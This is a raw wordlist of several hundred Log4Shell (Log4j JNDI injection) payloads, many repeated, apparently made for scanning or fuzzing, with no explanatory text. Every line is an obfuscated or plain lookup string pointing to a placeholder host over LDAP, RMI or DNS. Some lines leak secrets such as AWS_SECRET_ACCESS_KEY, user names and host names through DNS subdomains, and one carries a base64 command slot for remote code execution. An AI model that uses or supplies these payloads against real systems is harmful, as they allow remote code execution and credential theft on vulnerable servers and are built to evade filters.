${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${jndi:ldap://${hostName}.yoursite.com/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:rmi://yoursite.com},
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:ldap://yoursite.com:80/a}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${jndi:rmi://yoursite.com}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${hostName}.yoursite.com/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${jndi:dns://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${jndi:dns://yoursite.com:80/}
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:ldap://${hostName}.yoursite.com/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:ldap://yoursite.com/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${jndi:rmi://yoursite.com}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${jndi:rmi://yoursite.com}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:ldap://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jndi:rmi://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${jndi:rmi://yoursite.com},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jndi:dns://${hostName}.yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:dns://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${jndi:dns://yoursite.com:80/a}
${${date:'j'}ndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${date:'j'}ndi:dns://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
